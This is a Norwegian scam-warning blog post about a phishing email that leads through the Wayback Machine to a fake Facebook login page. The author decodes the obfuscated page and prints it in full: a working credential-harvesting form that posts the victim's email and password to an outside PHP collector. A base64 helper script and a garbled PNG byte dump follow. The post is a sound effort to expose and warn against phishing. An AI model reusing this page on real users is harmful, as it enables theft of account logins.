Skip to content
Datahjelperne

Datahjelperne

Primary Menu
  • Datahjelperne Pluss
  • Artikkel
    • Artikler
    • Teknologi
    • Mobil og nettbrett
      • Mobil
        • Data tilbehør
        • Mobil tilbehør
      • Nettbrett
        • Nettbrett tilbehør
    • Nettverk
    • Foto og Video
    • App
    • Lyd og Bilde
    • Smartklokke
    • Konkurranse
    • Programvare
    • Crypto
    • Nytt
    • Kommentar
  • Svindel
    • Svindel
    • E-post svindel
    • Crypto svindel
    • Nettside svindel
    • SMS Svindel
    • Facebook svindel
    • telefon svindel
  • Min Konto
  • Om Oss
  • Tips en venn – Vinn 1 million
  • Kontakt oss
  • Home
  • Artikler
  • Svindel
  • SVINDEL – Internet Archive: Wayback Machine misbrukes

SVINDEL – Internet Archive: Wayback Machine misbrukes

Jørund Heimholt 13. november 2018

Del dette:

  • Twitter
  • Facebook
  • Skriv ut
  • Reddit
  • LinkedIn
  • Telegram
  • E-post
wayback

Jeg fikk denne mailen som ett tips. Der det står at dine Facebook forespørsler skal stoppes før du har oppgradert kontoen din. Denne er ganske dårlig laget, men jeg liker å grave i spam. Det er nemlig en link i denne spammen som er interresant. Du ledes nemlig til en falsk Facebook påloggingside. Nettsiden som det linkes til på toppen av Facebook svindel er wayback machine.

wayback machine er ett av verdens mest kjente nettsteder for å sjekke historien til gamle internet sider på internet.

Jeg trykker meg nedover på linken i spam for å se hvor jeg havner og da finner jeg dette.

da finner jeg ut av man kan få tilgang til store deler av mappestrukturen. Før dette har blitt publisert så har jeg informert dem via mail om at dette må stenges ned. Jeg går tilbake til Facebooksvindelen og der går jeg inn for å se på koden i svindelen.

Det meste her er gresk for meg og dere, men på toppen så står der unescape. Det er en krypteringsmetode som brukes på nett. Så da kan jeg finne ett gratis verktøy som dekrypterer koden. Krypterer de koden så har de noe å skjule.

Når koden er dekryptert finner jeg dette:

<!–
document.write(unescape(‘<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01//EN” “http://www.w3.org/TR/html4/strict.dtd”>
<html><head>
<meta http-equiv=”content-type” content=”text/html; charset=windows-1252″>
<link rel=”shortcut icon” href=”favicon.gif” type=”image/gif”><title>Facebook | Security System</title>
<script type=”text/javascript” src=”data:application/x-javascript;base64,Ly8gcHJlc2V0LmpzICBDb3B5cmlnaHQgMjAwOS0yMDE0IGJ5IFJpY2hhcmQgTC4gVHJldGhld2V5IC0gQWxsIFJpZ2h0cyBSZXNlcnZlZAovLyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlIHRoaXMgY29kZSBhcyBsb25nIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZQovLyBpcyBsZWZ0IGludGFjdC4gIEZvciBtb3JlIGluZm9ybWF0aW9uLCBzZWUgaHR0cDovL3d3dy5yYWluYm9kZXNpZ24uY29tL3B1Yi8KCi8vIEdldCB0aGUgcXVlcnkgc3RyaW5nIGNvbnRlbnRzIGZyb20gdGhlIHBhZ2UgVVJMIHVzZWQgYnkgcmVtb3ZpbmcgdGhlICI/Igp2YXIgcXVlcnkgPSBsb2NhdGlvbi5zZWFyY2guc3Vic3RyKDEpOwoKdmFyICBzZWFyY2hfcGF0dGVybiA9ICdcXCsnOwp2YXIgIHNlYXJjaF9mbGFncyA9ICdnJzsKdmFyICBzZWFyY2hfcmVnX2V4cCA9IG5ldyBSZWdFeHAoc2VhcmNoX3BhdHRlcm4sIHNlYXJjaF9mbGFncyk7CgpmdW5jdGlvbiBwb3B1bGF0ZShmb3JtTmFtZSkgewogIGlmIChxdWVyeSkgewkJCQkJCS8vIFdhcyB0aGVyZSBhIHF1ZXJ5IHN0cmluZz8KdmFyIHBhcmFtcyA9IHF1ZXJ5LnNwbGl0KCImIik7CQkJCS8vIFllcyEgIFNwbGl0IHRoZW0gdXAKdmFyIHRoZUZvcm0gPSBmaW5kRm9ybShmb3JtTmFtZSk7CQkJLy8gTG9jYXRlIHRoZSBmb3JtIHdpdGggdGhlIGNvcnJlY3QgbmFtZS9JRAogICAgaWYgKHRoZUZvcm0gIT0gbnVsbCkgewkJCQkvLyBEaWQgd2UgZmluZCB0aGUgZm9ybT8KICAgICBmb3IgKHE9MDsgcTxwYXJhbXMubGVuZ3RoOyBxKyspIHsKICAgICAgeHkgPSBwYXJhbXNbcV0uc3BsaXQoIj0iKTsJCQkvLyBTcGxpdCB0aGUgY29tbWFuZCBpbnRvIG5hbWUvdmFsdWUgcGFpcgogICAgICBwYXJhbU5hbWUgPSB4eVswXTsKICAgICAgbmV3VmFsdWUgPSB1bmVzY2FwZSh4eVsxXS5yZXBsYWNlKHNlYXJjaF9yZWdfZXhwLCAnICcpKTsJLy8gdHJhbnNsYXRlIHF1ZXJ5IHN0cmluZwoKICAgICAgIGlmICh0aGVGb3JtLmVsZW1lbnRzW3BhcmFtTmFtZV0pIHsJCS8vIGRvZXMgbmFtZWQgZWxlbWVudCBleGlzdD8KCi8vIGFsZXJ0KHBhcmFtTmFtZSArICcgJyArIHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXSArICcgJyArIHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXS50eXBlKTsKCiAgICAgICBzd2l0Y2godGhlRm9ybS5lbGVtZW50c1twYXJhbU5hbWVdLnR5cGUpIHsKICAgICAgICBjYXNlICd0ZXh0JzoJCQkJCS8vIHR5cGUgPSAidGV4dCIKICAgICAgICBjYXNlICdoaWRkZW4nOgkJCQkJLy8gdHlwZSA9ICJoaWRkZW4iCgljYXNlICd0ZXh0YXJlYSc6CQkJCS8vIDx0ZXh0YXJlYT4KICAgICAgICBjYXNlICdlbWFpbCc6CQkJCQkvLyB0eXBlID0gImVtYWlsIgogICAgICAgIGNhc2UgJ3NlYXJjaCc6CQkJCQkvLyB0eXBlID0gInNlYXJjaCIKICAgICAgICBjYXNlICd1cmwnOgkJCQkJLy8gdHlwZSA9ICJ1cmwiCiAgICAgICAgY2FzZSAnbnVtYmVyJzoJCQkJCS8vIHR5cGUgPSAibnVtYmVyIgogICAgICAgIGNhc2UgJ3JhbmdlJzoJCQkJCS8vIHR5cGUgPSAicmFuZ2UiCiAgICAgICAgICB0aGVGb3JtLmVsZW1lbnRzW3BhcmFtTmFtZV0udmFsdWUgPSBuZXdWYWx1ZTsKICAgICAgICBicmVhazsKCiAgICAgICAgY2FzZSAnc2VsZWN0LW9uZSc6CQkJCS8vIDxzZWxlY3Q+CgkgIHRoZU9wdGlvbiA9IHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXTsKCSAgIG1heCA9IHRoZU9wdGlvbi5sZW5ndGg7CgkgICBmb3IgKGkgPSAwOyBpIDwgbWF4OyBpKyspIHsKCSAgICBpZiAodGhlT3B0aW9uLm9wdGlvbnNbaV0udmFsdWUgPT0gbmV3VmFsdWUpIHsgdGhlT3B0aW9uLm9wdGlvbnMuc2VsZWN0ZWRJbmRleCA9IGk7IH0KCSAgIH0gIC8vIGVuZCBmb3IgaQogICAgICAgIGJyZWFrOwoKICAgICAgICBjYXNlIHVuZGVmaW5lZDoJCQkJCS8vIHR5cGUgPSAicmFkaW8iIChyZWFsbHkgJ25vZGVMaXN0JykKCWlmICh0aGVGb3JtLmVsZW1lbnRzW3BhcmFtTmFtZV0pIHsJCS8vIGRvdWJsZS1jaGVjayB0aGlzIGVsZW1lbnQgZXhpc3RzCgkgIHRoZU9wdGlvbiA9IHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXTsKCSAgbWF4ID0gdGhlT3B0aW9uLmxlbmd0aDsKCSAgZm9yIChpID0gMDsgaSA8IG1heDsgaSsrKSB7CgkgICBpZiAodGhlT3B0aW9uW2ldLnZhbHVlID09IG5ld1ZhbHVlKSB7IHRoZU9wdGlvbltpXS5jaGVja2VkID0gdHJ1ZTsgfQoJICB9ICAvLyBlbmQgZm9yIGkKCSB9IC8vIGVuZGlmIGV4aXN0cwogICAgICAgIGJyZWFrOwoKICAgICAgICBjYXNlICdjaGVja2JveCc6CQkJCS8vIHR5cGU9ImNoZWNrYm94IgogICAgICAgICAgdGhlRm9ybS5lbGVtZW50c1twYXJhbU5hbWVdLmNoZWNrZWQgPSB0cnVlOwogICAgICAgIGJyZWFrOwoKICAgICAgIH0gLy8gZW5kIHN3aXRjaAogICAgICB9IC8vIGVuZGlmIHRoZUZvcm0uZWxlbWVudHNbcGFyYW1OYW1lXQogICAgfSAvLyBlbmQgZm9yIHEKICAgfSAvLyBlbmRpZiB7dGhlRm9ybSkKIH0gLy8gZW5kaWYgKHF1ZXJ5KQp9IC8vIGVuZCBwb3B1bGF0ZSgpCgpmdW5jdGlvbiBmaW5kRm9ybSh0aGVGb3JtKSB7CmlmIChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCh0aGVGb3JtKSkgewkJCS8vIHRyeSBJRCBmaXJzdAogZm9ybUVsZW1lbnQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCh0aGVGb3JtKTsKICB9IGVsc2UgewogZm9yIChpPTA7IGk8ZG9jdW1lbnQuZm9ybXMubGVuZ3RoOyBpKyspIHsKICBpZiAoZG9jdW1lbnQuZm9ybXNbaV0ubmFtZSA9PSB0aGVGb3JtKSB7IGZvcm1FbGVtZW50ID0gZG9jdW1lbnQuZm9ybXNbaV07IGJyZWFrOyB9CiB9IC8vIGVuZEZvcgp9IC8vIGVuZGlmIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkCnJldHVybiBmb3JtRWxlbWVudDsKfSAvLyBlbmQgZmluZEZvcm0KCg==”></script>
<style type=”text/css”>
body {
overflow-x:hidden;
}
</style></head><body style=”color: rgb(0, 0, 0); background-color: white;” topmargin=”0″ bottommargin=”0″ leftmargin=”0″ rightmargin=”0″ onload=”populate(‘myForm’);” alink=”#000099″ link=”#000099″ marginheight=”0″ marginwidth=”0″ vlink=”#990099″>
<table style=”width: 100%; height: 100%; text-align: left; margin-left: auto; margin-right: auto;” cellspacing=”0″>
<tbody>
<tr>
<td style=”height: 10%; background-color: white;”></td>
</tr>
<tr>
<td style=”height: 20%; background-color: white;”>
<div style=”text-align: center;”> </div>
<table style=”width: 1180px; height: 136px; text-align: left; margin-left: auto; margin-right: auto;”>
<tbody>
<tr>
<td style=”background-color: white; text-align: center;”>
<img src=”https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZZgf_oHn5QrDOAoxRs88Ui_RF1u-D1C9XaXZcCstTmLXRE62T” alt=”Image result for facebook log” style=”color: rgb(0, 0, 0); font-family: “Times New Roman”; font-size: medium; font-style: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; width: 150px; height: 87px;”> </td>
<td style=”background-color: white;”>
<div align=”right”> <br>
<br>
<br>
<div style=”color: white; text-align: center;”><font style=”color: silver; font-weight: bold;” face=”calibri” size=”+2″><span style=”color: white;”>Update
and  Confirm.</span><br>
</font></div>
</div>
<div style=”text-align: center;”><font color=”#ffffff” face=”calibri” size=”+2″> </font></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=”height: 55%;”>
<table style=”background-color: white; height: 300px; text-align: left; margin-left: auto; margin-right: auto;”>
<tbody>
<tr>
<td bgcolor=”” width=”580″>
<table align=”left” width=”500″>
<tbody>
<tr>
<td>
<form method=”post” action=”https://pacificindustriesltd1959.000webhostapp.com/ba8.php” name=”myForm”> <font color=”” face=”calibri” size=”3″> <span style=”font-weight: bold; color: rgb(102, 102, 102);”></span><br>
<font color=”#df0101″ face=”calibri” size=”+2″> <span style=”font-weight: bold; color: rgb(51, 51, 153);”>Update
Your Facebook Account Version.</span><br>
<font style=”color: rgb(102, 102, 102);” color=”#000000″ size=”3″><b>Login with your
details below and update.</b></font><span style=”color: rgb(102, 102, 102);”> </span></font>
<br>
<br>
<input value=”” name=”usernms” style=”border: 2px solid rgb(255, 64, 0); padding: 10px; width: 375px; height: 40px; font-family: Verdana; font-size: 14px; color: rgb(0, 0, 0); background-color: rgb(250, 250, 250);” =”” required=”” placeholder=”Enter Email” type=”email”>
<p> <input name=”pswds” style=”border: 2px solid rgb(255, 64, 0); padding: 10px; width: 375px; height: 40px; font-family: Verdana; font-size: 14px; color: rgb(0, 0, 0); background-color: rgb(250, 250, 250);” =”” required=”” placeholder=”Enter Password” type=”password”> </p>
</font>
<p><font color=”” face=”calibri” size=”3″> <input value=”Login To Confirm” style=”border: 3px solid rgb(223, 1, 1); width: 375px; height: 50px; font-family: Verdana; font-size: 18px; color: rgb(255, 255, 255); -moz-border-radius-topleft: 3px; -moz-border-radius-topright: 3px; -moz-border-radius-bottomright: 3px; -moz-border-radius-bottomleft: 3px; background-color: rgb(223, 1, 1);” type=”submit”> </font> </p>
</form>
</td>
</tr>
</tbody>
</table>
</td>
<td width=”80″></td>
<td style=”width: 220px; background-color: white;”>
<div align=”center”> <img style=”width: 181px; height: 65px;” src=”https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRbqiIhSWdQzJzQCc2N_-lAFPxc9dqUD9Y2OQiajd1HurHwfGFr” alt=”Image result for email security logo”> </div>
<br>
<div align=”center”> <img style=”width: 192px; height: 163px;” src=”data:image/png;base64,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” alt=”Image result for email security logo”> </div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr style=”color: silver;”>
<td bgcolor=”#ffffff” height=”10%”>
<div style=”text-align: center;”></div>
<table align=”center” width=”966″>
<tbody>
<tr>
<td>
<p style=”text-align: center;”><br>
</p>
<div class=”_li” id=”u_0_b” style=”font-family: Helvetica,Arial,sans-serif; color: rgb(29, 33, 41); font-size: 12px; font-style: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; text-align: center;”>
<div id=”globalContainer” class=”uiContextualLayerParent” style=”margin: 0px auto; position: relative; font-family: inherit;”>
<div style=”font-family: inherit;”>
<div id=”pageFooter” data-referrer=”page_footer” style=”margin: 0px auto; color: rgb(115, 115, 115); width: 980px; font-family: inherit;”>
<div class=”mvl copyright” style=”margin-top: 20px; margin-bottom: 20px; font-size: 11px; font-family: inherit;”>
<div style=”font-family: inherit;”> Copyright �
1999-2018 Facebook. All rights reserved</div>
</div>
</div>
</div>
</div>
</div>
<p align=”center”></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=”height: 5%; background-color: white;”></td>
</tr>
</tbody>
</table>
</body></html>’));
//–>
</script>

Som du ser så har jeg dekodet en del av teksten, men det er fortsatt noe som er kryptert. Denne gangen med Base64. Det er teksten merket med blått.  Det første blå får jeg dekodet og da finner jeg denne koden:

// preset.js Copyright 2009-2014 by Richard L. Trethewey – All Rights Reserved
// Permission is granted to use this code as long as this copyright notice
// is left intact. For more information, see http://www.rainbodesign.com/pub/

// Get the query string contents from the page URL used by removing the “?”
var query = location.search.substr(1);

var search_pattern = ‘\+’;
var search_flags = ‘g’;
var search_reg_exp = new RegExp(search_pattern, search_flags);

function populate(formName) {
if (query) { // Was there a query string?
var params = query.split(“&”); // Yes! Split them up
var theForm = findForm(formName); // Locate the form with the correct name/ID
if (theForm != null) { // Did we find the form?
for (q=0; q<params.length; q++) {
xy = params[q].split(“=”); // Split the command into name/value pair
paramName = xy[0];
newValue = unescape(xy[1].replace(search_reg_exp, ‘ ‘)); // translate query string

if (theForm.elements[paramName]) { // does named element exist?

// alert(paramName + ‘ ‘ + theForm.elements[paramName] + ‘ ‘ + theForm.elements[paramName].type);

switch(theForm.elements[paramName].type) {
case ‘text’: // type = “text”
case ‘hidden’: // type = “hidden”
case ‘textarea’: // <textarea>
case ’email’: // type = “email”
case ‘search’: // type = “search”
case ‘url’: // type = “url”
case ‘number’: // type = “number”
case ‘range’: // type = “range”
theForm.elements[paramName].value = newValue;
break;

case ‘select-one’: // <select>
theOption = theForm.elements[paramName];
max = theOption.length;
for (i = 0; i < max; i++) {
if (theOption.options[i].value == newValue) { theOption.options.selectedIndex = i; }
} // end for i
break;

case undefined: // type = “radio” (really ‘nodeList’)
if (theForm.elements[paramName]) { // double-check this element exists
theOption = theForm.elements[paramName];
max = theOption.length;
for (i = 0; i < max; i++) {
if (theOption[i].value == newValue) { theOption[i].checked = true; }
} // end for i
} // endif exists
break;

case ‘checkbox’: // type=”checkbox”
theForm.elements[paramName].checked = true;
break;

} // end switch
} // endif theForm.elements[paramName]
} // end for q
} // endif {theForm)
} // endif (query)
} // end populate()

function findForm(theForm) {
if (document.getElementById(theForm)) { // try ID first
formElement = document.getElementById(theForm);
} else {
for (i=0; i<document.forms.length; i++) {
if (document.forms[i].name == theForm) { formElement = document.forms[i]; break; }
} // endFor
} // endif document.getElementById
return formElement;
} // end findForm

På den andre blå teksten så finner jeg dette.

PNG

IHDR>PLTE﴾uq oylrb1kMǰ3~BRhгՔׅw֎ߙٴn̸ޥ͘f\M}x\>2KIDATx}<AWYKU+SZ1A|R7+{!iRH[}srrr&‡>}YV7Q~Ҭ?dMUU0TUժ(m5>O]5@:w֨h!GUIo5T==uP?ndbUzi՞5Myߩ,Y垫&UzmE,ՇU涪S=dҜ6K2isoAy$n[EV9ߏoXq}Ԯ]\4zkGϕ^FAmիfsv]Yl7 yܻ{([)ͫͣJh޹:/x=1kU
Tf⪍hJdp8[dX51Wݴ^zyTk~wH֫;]lM
ũXYL~MϿ嶟]wmCƨ:P9im<#i
&2h;hm< 2d/>4>;uU꧵)U^ʱЀݹ =i89TU3#FWF 볾c@3zy}YCXv”hԇk#Z:XJ7iNI: FVkchP쾃C=ִ dk"~Z!
t;4pw~c$9U3M6'|7"N ;6
ZF>9]7R$>:Cƶ{{ mM3?J^9:W6/.,h-u{º|N
Isact+@[>WԻɠsA=AyÄvlFsjz2hN]Lz
,=ɆqMC1\Z.;uq霵? CJ~#Z6^i6ޕwe3źLm/8e(Pjar{E
A[ȂzmKЕ%f”s tDvl/[<ʁ>/l
